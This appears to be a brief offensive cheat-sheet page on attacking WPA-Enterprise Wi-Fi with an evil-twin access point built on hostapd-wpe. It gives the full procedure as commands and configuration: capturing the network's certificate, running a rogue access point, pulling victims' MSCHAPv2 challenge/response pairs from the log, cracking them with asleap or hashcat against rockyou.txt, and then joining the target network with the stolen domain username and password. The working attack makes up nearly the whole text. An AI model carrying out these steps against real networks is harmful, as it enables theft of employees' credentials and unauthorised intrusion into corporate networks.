WPA-E (hostapd)
Capture the cert first using monitor mode:
using wireshark then filter the certificate:
tls.handshake.certificate
sudo airmon-ng check kill
Make sure know the target SSID, this technique seems to be an Evil-Twin attack of the wifi access point.
change file in /etc/hostapd-wpe/hostapd-wpe.conf
# Configuration file for hostapd-wpe
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1
# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh
# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]
Run Evil Twin:
sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
After victim input username and password:

or check the log:
cat /var/log/hostapd-wpe.log
Then crack the password with rockyou.txt:
asleap -C <Challenge> -R <Response> -W /usr/share/wordlist/rockyou.txt
alternatively using hashcat:
hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlist/rockyou.txt
ref:
https://wirelessdefence.co.uk/hostapd-wpe/
After got the password and the username connect with terminal:
create config file connect_wpa-e.conf
network={
scan_ssid=1
eap=PEAP
ssid="<TARGET-NAME>"
key_mgmt=WPA-EAP
identity="<DOMAIN\USERNAME>"
password="<PASSWORD>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Then connect with wpa-supplicant:
sudo wpa_supplicant -B -i wlan0 -c ./connect_wpa-e.conf
Obtain an IP Address:
sudo dhclient wlan0
Last updated